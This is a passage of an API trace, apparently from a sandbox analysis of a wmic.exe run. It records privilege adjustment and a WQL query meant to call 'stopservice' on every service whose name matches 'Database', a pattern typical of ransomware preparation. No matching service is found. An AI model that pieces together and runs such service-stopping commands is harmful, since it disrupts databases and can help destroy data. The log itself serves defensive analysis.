lFlags=0, pVal=0x1ed220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff4d2948, varVal2=0x6fc), plFlavor=0x0 | out: pVal=0x1ed220*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x6fc), plFlavor=0x0) returned 0x0 [0255.238] free (_Block=0x2acc00) [0255.239] malloc (_Size=0x18) returned 0x2acc00 [0255.239] IUnknown:Release (This=0x1cf13b0) returned 0x0 [0255.239] malloc (_Size=0x70) returned 0x2acfe0 [0255.239] malloc (_Size=0x70) returned 0x2ad1a0 [0255.239] malloc (_Size=0x48) returned 0x2ad060 [0255.239] malloc (_Size=0x18) returned 0x2acc60 [0255.239] malloc (_Size=0x70) returned 0x2ad220 [0255.239] malloc (_Size=0x70) returned 0x2ad2a0 [0255.239] malloc (_Size=0x48) returned 0x2ad320 [0255.239] malloc (_Size=0x50) returned 0x2ad370 [0255.239] malloc (_Size=0x70) returned 0x2ad3d0 [0255.239] malloc (_Size=0x70) returned 0x2ad450 [0255.239] malloc (_Size=0x48) returned 0x2ad4d0 [0255.239] free (_Block=0x2ad320) [0255.239] free (_Block=0x2ad2a0) [0255.239] free (_Block=0x2ad220) [0255.239] free (_Block=0x2ad060) [0255.239] free (_Block=0x2ad1a0) [0255.239] free (_Block=0x2acfe0) [0255.239] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0255.239] free (_Block=0x2ad150) [0255.240] free (_Block=0x2ad0d0) [0255.240] free (_Block=0x2acf60) [0255.240] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="PauseService", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c4a0) returned 0x0 [0255.240] lstrlenW (lpString="PauseService") returned 12 [0255.240] lstrlenW (lpString="stopservice") returned 11 [0255.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0255.240] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0255.240] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="ResumeService", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c4a0) returned 0x0 [0255.240] lstrlenW (lpString="ResumeService") returned 13 [0255.240] lstrlenW (lpString="stopservice") returned 11 [0255.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0255.240] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0255.240] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="InterrogateService", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c4a0) returned 0x0 [0255.240] lstrlenW (lpString="InterrogateService") returned 18 [0255.240] lstrlenW (lpString="stopservice") returned 11 [0255.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0255.240] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0255.240] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="UserControlService", ppInSignature=0x1ed2c0*=0x1d2c520, ppOutSignature=0x1ed2c8*=0x1d2ca20) returned 0x0 [0255.241] lstrlenW (lpString="UserControlService") returned 18 [0255.241] lstrlenW (lpString="stopservice") returned 11 [0255.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0255.241] IUnknown:Release (This=0x1d2c520) returned 0x0 [0255.241] IUnknown:Release (This=0x1d2ca20) returned 0x0 [0255.241] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="Create", ppInSignature=0x1ed2c0*=0x1d2e470, ppOutSignature=0x1ed2c8*=0x1d2e970) returned 0x0 [0255.241] lstrlenW (lpString="Create") returned 6 [0255.241] lstrlenW (lpString="stopservice") returned 11 [0255.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0255.242] IUnknown:Release (This=0x1d2e470) returned 0x0 [0255.242] IUnknown:Release (This=0x1d2e970) returned 0x0 [0255.242] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="Change", ppInSignature=0x1ed2c0*=0x1d2e1f0, ppOutSignature=0x1ed2c8*=0x1d2e6f0) returned 0x0 [0255.242] lstrlenW (lpString="Change") returned 6 [0255.242] lstrlenW (lpString="stopservice") returned 11 [0255.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0255.242] IUnknown:Release (This=0x1d2e1f0) returned 0x0 [0255.242] IUnknown:Release (This=0x1d2e6f0) returned 0x0 [0255.242] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="ChangeStartMode", ppInSignature=0x1ed2c0*=0x1d2c610, ppOutSignature=0x1ed2c8*=0x1d2cb10) returned 0x0 [0255.243] lstrlenW (lpString="ChangeStartMode") returned 15 [0255.243] lstrlenW (lpString="stopservice") returned 11 [0255.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0255.243] IUnknown:Release (This=0x1d2c610) returned 0x0 [0255.243] IUnknown:Release (This=0x1d2cb10) returned 0x0 [0255.243] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="Delete", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c4a0) returned 0x0 [0255.243] lstrlenW (lpString="Delete") returned 6 [0255.243] lstrlenW (lpString="stopservice") returned 11 [0255.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0255.243] IUnknown:Release (This=0x1d2c4a0) returned 0x0 [0255.243] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="GetSecurityDescriptor", ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x1d2c640) returned 0x0 [0255.243] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0255.243] lstrlenW (lpString="stopservice") returned 11 [0255.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0255.244] IUnknown:Release (This=0x1d2c640) returned 0x0 [0255.244] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*="SetSecurityDescriptor", ppInSignature=0x1ed2c0*=0x1d2c520, ppOutSignature=0x1ed2c8*=0x1d2ca20) returned 0x0 [0255.244] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0255.244] lstrlenW (lpString="stopservice") returned 11 [0255.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0255.244] IUnknown:Release (This=0x1d2c520) returned 0x0 [0255.244] IUnknown:Release (This=0x1d2ca20) returned 0x0 [0255.244] IWbemClassObject:NextMethod (in: This=0x1d2bfa0, lFlags=0, pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0 | out: pstrName=0x1ed2b8*=0x0, ppInSignature=0x1ed2c0*=0x0, ppOutSignature=0x1ed2c8*=0x0) returned 0x40005 [0255.244] IUnknown:Release (This=0x1d2bfa0) returned 0x0 [0255.244] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.244] lstrlenW (lpString="SET") returned 3 [0255.244] lstrlenW (lpString="call") returned 4 [0255.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0255.244] lstrlenW (lpString="CREATE") returned 6 [0255.244] lstrlenW (lpString="call") returned 4 [0255.244] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0255.244] free (_Block=0x2a8640) [0255.244] malloc (_Size=0x8) returned 0x2acf60 [0255.244] lstrlenW (lpString="GET") returned 3 [0255.245] lstrlenW (lpString="call") returned 4 [0255.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0255.245] lstrlenW (lpString="LIST") returned 4 [0255.245] lstrlenW (lpString="call") returned 4 [0255.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0255.245] lstrlenW (lpString="ASSOC") returned 5 [0255.245] lstrlenW (lpString="call") returned 4 [0255.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0255.245] WbemLocator:IUnknown:AddRef (This=0x1cf1390) returned 0x3 [0255.245] free (_Block=0x2a6a50) [0255.245] lstrlenW (lpString="") returned 0 [0255.245] lstrlenW (lpString="XDUWTFONO") returned 9 [0255.245] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0255.245] lstrlenW (lpString="XDUWTFONO") returned 9 [0255.245] malloc (_Size=0x14) returned 0x2acc80 [0255.245] lstrlenW (lpString="XDUWTFONO") returned 9 [0255.245] GetCurrentThreadId () returned 0x6fc [0255.245] GetCurrentProcess () returned 0xffffffffffffffff [0255.245] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1ef600 | out: TokenHandle=0x1ef600*=0x29c) returned 1 [0255.245] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ef5f8 | out: TokenInformation=0x0, ReturnLength=0x1ef5f8) returned 0 [0255.245] malloc (_Size=0x118) returned 0x2acf80 [0255.245] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x3, TokenInformation=0x2acf80, TokenInformationLength=0x118, ReturnLength=0x1ef5f8 | out: TokenInformation=0x2acf80, ReturnLength=0x1ef5f8) returned 1 [0255.246] AdjustTokenPrivileges (in: TokenHandle=0x29c, DisableAllPrivileges=0, NewState=0x2acf80*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1312067412, Attributes=0x8cc6), (Luid.LowPart=0x0, Luid.HighPart=2779728, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=2752856, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x10008cdb), (Luid.LowPart=0x0, Luid.HighPart=2805600, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0255.246] free (_Block=0x2acf80) [0255.246] CloseHandle (hObject=0x29c) returned 1 [0255.246] lstrlenW (lpString="GET") returned 3 [0255.246] lstrlenW (lpString="call") returned 4 [0255.246] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0255.246] lstrlenW (lpString="LIST") returned 4 [0255.246] lstrlenW (lpString="call") returned 4 [0255.246] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0255.246] lstrlenW (lpString="SET") returned 3 [0255.246] lstrlenW (lpString="call") returned 4 [0255.246] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0255.246] lstrlenW (lpString="CALL") returned 4 [0255.246] lstrlenW (lpString="call") returned 4 [0255.246] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0255.246] ??0CHString@@QEAA@XZ () returned 0x1ef5b0 [0255.246] GetCurrentThreadId () returned 0x6fc [0255.247] malloc (_Size=0x18) returned 0x2acca0 [0255.247] malloc (_Size=0x18) returned 0x2accc0 [0255.247] malloc (_Size=0x18) returned 0x2acce0 [0255.247] malloc (_Size=0x18) returned 0x2acd00 [0255.247] malloc (_Size=0x18) returned 0x2ad550 [0255.247] SysStringLen (param_1="\\\\") returned 0x2 [0255.247] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0255.247] malloc (_Size=0x18) returned 0x2ad570 [0255.247] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0255.247] SysStringLen (param_1="\\") returned 0x1 [0255.247] malloc (_Size=0x18) returned 0x2ad590 [0255.247] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0255.247] SysStringLen (param_1="root\\cimv2") returned 0xa [0255.248] free (_Block=0x2ad570) [0255.248] free (_Block=0x2ad550) [0255.248] free (_Block=0x2acd00) [0255.248] free (_Block=0x2acce0) [0255.248] free (_Block=0x2accc0) [0255.248] free (_Block=0x2acca0) [0255.248] malloc (_Size=0x18) returned 0x2acca0 [0255.248] malloc (_Size=0x18) returned 0x2accc0 [0255.248] malloc (_Size=0x18) returned 0x2acce0 [0255.248] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cf1390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4d29d0 | out: ppNamespace=0xff4d29d0*=0x1d03b28) returned 0x0 [0255.255] free (_Block=0x2acce0) [0255.255] free (_Block=0x2accc0) [0255.255] free (_Block=0x2acca0) [0255.255] CoSetProxyBlanket (pProxy=0x1d03b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0255.255] free (_Block=0x2ad590) [0255.255] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.255] ??0CHString@@QEAA@XZ () returned 0x1ef358 [0255.255] GetCurrentThreadId () returned 0x6fc [0255.255] malloc (_Size=0x70) returned 0x2acf80 [0255.255] malloc (_Size=0x50) returned 0x2ad000 [0255.255] malloc (_Size=0x50) returned 0x2ad060 [0255.255] malloc (_Size=0x70) returned 0x2ad0c0 [0255.256] malloc (_Size=0x70) returned 0x2ad140 [0255.256] malloc (_Size=0x48) returned 0x2ad1c0 [0255.256] malloc (_Size=0x18) returned 0x2acca0 [0255.256] lstrlenA (lpString="") returned 0 [0255.256] malloc (_Size=0x2) returned 0x2a6a50 [0255.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x2a6a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0255.256] free (_Block=0x2a6a50) [0255.256] malloc (_Size=0x70) returned 0x2ad210 [0255.256] malloc (_Size=0x48) returned 0x2ad290 [0255.256] malloc (_Size=0x18) returned 0x2accc0 [0255.256] free (_Block=0x2acca0) [0255.256] IWbemServices:GetObject (in: This=0x1d03b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x1ef388*=0x0, ppCallResult=0x0 | out: ppObject=0x1ef388*=0x1d2c030, ppCallResult=0x0) returned 0x0 [0255.276] malloc (_Size=0x18) returned 0x2acca0 [0255.276] IWbemClassObject:GetMethod (in: This=0x1d2c030, wszName="stopservice", lFlags=0, ppInSignature=0x1ef380, ppOutSignature=0x1ef398 | out: ppInSignature=0x1ef380*=0x0, ppOutSignature=0x1ef398*=0x1d2c530) returned 0x0 [0255.277] free (_Block=0x2acca0) [0255.277] IUnknown:Release (This=0x1d2c530) returned 0x0 [0255.277] IUnknown:Release (This=0x1d2c030) returned 0x0 [0255.277] ??0CHString@@QEAA@XZ () returned 0x1ef1a0 [0255.277] GetCurrentThreadId () returned 0x6fc [0255.277] malloc (_Size=0x18) returned 0x2acca0 [0255.277] lstrlenA (lpString="") returned 0 [0255.277] malloc (_Size=0x2) returned 0x2a6a50 [0255.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x2a6a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0255.277] free (_Block=0x2a6a50) [0255.277] malloc (_Size=0x18) returned 0x2acce0 [0255.277] lstrlenA (lpString="") returned 0 [0255.277] malloc (_Size=0x2) returned 0x2a6a50 [0255.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff46314c, cbMultiByte=-1, lpWideCharStr=0x2a6a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0255.277] free (_Block=0x2a6a50) [0255.277] malloc (_Size=0x18) returned 0x2acd00 [0255.277] free (_Block=0x2acce0) [0255.278] malloc (_Size=0x18) returned 0x2acce0 [0255.278] lstrlenA (lpString="SELECT * FROM ") returned 14 [0255.278] malloc (_Size=0x1e) returned 0x2ad2e0 [0255.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff464a40, cbMultiByte=-1, lpWideCharStr=0x2ad2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0255.278] free (_Block=0x2ad2e0) [0255.278] malloc (_Size=0x18) returned 0x2ad550 [0255.278] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0255.278] SysStringLen (param_1="Win32_Service") returned 0xd [0255.278] free (_Block=0x2acce0) [0255.278] malloc (_Size=0x18) returned 0x2acce0 [0255.278] malloc (_Size=0x18) returned 0x2ad570 [0255.278] lstrlenA (lpString=" WHERE ") returned 7 [0255.278] malloc (_Size=0x10) returned 0x2ad590 [0255.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff463e20, cbMultiByte=-1, lpWideCharStr=0x2ad590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0255.278] free (_Block=0x2ad590) [0255.278] malloc (_Size=0x18) returned 0x2ad590 [0255.279] SysStringLen (param_1=" WHERE ") returned 0x7 [0255.279] SysStringLen (param_1="name like '%%Database%%'") returned 0x18 [0255.279] malloc (_Size=0x18) returned 0x2ad5b0 [0255.279] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0255.279] SysStringLen (param_1=" WHERE name like '%%Database%%'") returned 0x1f [0255.279] free (_Block=0x2ad550) [0255.279] free (_Block=0x2ad590) [0255.279] free (_Block=0x2ad570) [0255.279] free (_Block=0x2acce0) [0255.279] malloc (_Size=0x18) returned 0x2acce0 [0255.279] IWbemServices:ExecQuery (in: This=0x1d03b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%Database%%'", lFlags=48, pCtx=0x0, ppEnum=0x1ef188 | out: ppEnum=0x1ef188*=0x1d03c28) returned 0x0 [0255.285] free (_Block=0x2acce0) [0255.285] CoSetProxyBlanket (pProxy=0x1d03c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0255.288] IEnumWbemClassObject:Next (in: This=0x1d03c28, lTimeout=-1, uCount=0x1, apObjects=0x1ef190, puReturned=0x1ef318 | out: apObjects=0x1ef190*=0x0, puReturned=0x1ef318*=0x0) returned 0x1 [0255.722] IUnknown:Release (This=0x1d03c28) returned 0x0 [0255.723] free (_Block=0x2ad5b0) [0255.723] free (_Block=0x2acd00) [0255.723] free (_Block=0x2acca0) [0255.723] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.723] free (_Block=0x2accc0) [0255.724] free (_Block=0x2ad1c0) [0255.724] free (_Block=0x2ad140) [0255.724] free (_Block=0x2ad0c0) [0255.724] free (_Block=0x2ad060) [0255.724] free (_Block=0x2ad000) [0255.724] free (_Block=0x2ad290) [0255.724] free (_Block=0x2ad210) [0255.724] free (_Block=0x2acf80) [0255.724] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0255.724] GetCurrentThreadId () returned 0x6fc [0255.724] ??0CHString@@QEAA@PEBG@Z () returned 0x1ef6a8 [0255.724] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1ef6a8 [0255.724] malloc (_Size=0x800) returned 0x2add20 [0255.724] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x2add20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0255.725] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0255.725] malloc (_Size=0x1c) returned 0x2acf80 [0255.725] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x2acf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0255.725] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0255.725] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0255.725] free (_Block=0x2acf80) [0255.725] free (_Block=0x2add20) [0255.725] ??1CHString@@QEAA@XZ () returned 0x63348f01 [0255.725] WbemLocator:IUnknown:Release (This=0x1d03b28) returned 0x0 [0255.726] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0255.726] _kbhit () returned 0x0 [0255.727] free (_Block=0x2acf60) [0255.727] free (_Block=0x2acb00) [0255.727] free (_Block=0x2acae0) [0255.727] free (_Block=0x2acac0) [0255.728] free (_Block=0x2acaa0) [0255.728] free (_Block=0x2acdc0) [0255.728] free (_Block=0x2a7140) [0255.728] free (_Block=0x2acf00) [0255.728] free (_Block=0x2a8680) [0255.728] free (_Block=0x2acba0) [0255.728] free (_Block=0x2acbc0) [0255.728] free (_Block=0x2a6ea0) [0255.728] free (_Block=0x2ad4d0) [0255.728] free (_Block=0x2acbe0) [0255.728] free (_Block=0x2acc40) [0255.728] free (_Block=0x2ad450) [0255.728] free (_Block=0x2ad3d0) [0255.728] free (_Block=0x2acc20) [0255.728] free (_Block=0x2acc00) [0255.728] free (_Block=0x2acc60) [0255.728] free (_Block=0x2ad370) [0255.728] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0255.728] free (_Block=0x2ace60) [0255.728] free (_Block=0x2acb40) [0255.728] free (_Block=0x2acf30) [0255.728] free (_Block=0x2acb80) [0255.728] free (_Block=0x2a8600) [0255.728] free (_Block=0x2acb60) [0255.729] free (_Block=0x2acb20) [0255.729] free (_Block=0x2a7f70) [0255.729] free (_Block=0x2a6980) [0255.729] free (_Block=0x2a69d0) [0255.729] free (_Block=0x2acc80) [0255.729] free (_Block=0x2a6ac0) [0255.729] free (_Block=0x2a6e80) [0255.729] free (_Block=0x2a8040) [0255.729] free (_Block=0x2a6e60) [0255.729] free (_Block=0x2a8000) [0255.729] free (_Block=0x2a6e00) [0255.729] free (_Block=0x2a6e20) [0255.729] free (_Block=0x2a6ce0) [0255.729] free (_Block=0x2a6d00) [0255.729] free (_Block=0x2a6c80) [0255.729] free (_Block=0x2a6ca0) [0255.729] free (_Block=0x2a6d40) [0255.729] free (_Block=0x2a6d60) [0255.729] free (_Block=0x2a6da0) [0255.729] free (_Block=0x2a6dc0) [0255.730] free (_Block=0x2a6bc0) [0255.730] free (_Block=0x2a6be0) [0255.730] free (_Block=0x2a6b60) [0255.730] free (_Block=0x2a6b80) [0255.730] free (_Block=0x2a6c20) [0255.730] free (_Block=0x2a6c40) [0255.730] free (_Block=0x2a6b00) [0255.730] free (_Block=0x2a6b20) [0255.730] free (_Block=0x2a6a70) [0255.730] free (_Block=0x2a6a20) [0255.730] free (_Block=0x2acd30) [0255.730] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x2 [0255.730] WbemLocator:IUnknown:Release (This=0x1d03a98) returned 0x0 [0255.730] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x1 [0255.730] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0255.731] WbemLocator:IUnknown:Release (This=0x1cf1390) returned 0x0 [0255.731] free (_Block=0x2aca20) [0255.731] free (_Block=0x2aca40) [0255.731] free (_Block=0x2a8540) [0255.731] free (_Block=0x2aca60) [0255.731] free (_Block=0x2aca80) [0255.731] free (_Block=0x2a8580) [0255.731] free (_Block=0x2ac8a0) [0255.731] free (_Block=0x2ac8c0) [0255.731] free (_Block=0x2a83c0) [0255.731] free (_Block=0x2ac8e0) [0255.731] free (_Block=0x2ac900) [0255.731] free (_Block=0x2a8400) [0255.731] free (_Block=0x2ac820) [0255.731] free (_Block=0x2ac840) [0255.731] free (_Block=0x2a8340) [0255.731] free (_Block=0x2ac860) [0255.731] free (_Block=0x2ac880) [0255.731] free (_Block=0x2a8380) [0255.732] free (_Block=0x2ac9a0) [0255.732] free (_Block=0x2ac9c0) [0255.732] free (_Block=0x2a84c0) [0255.732] free (_Block=0x2ac9e0) [0255.732] free (_Block=0x2aca00) [0255.732] free (_Block=0x2a8500) 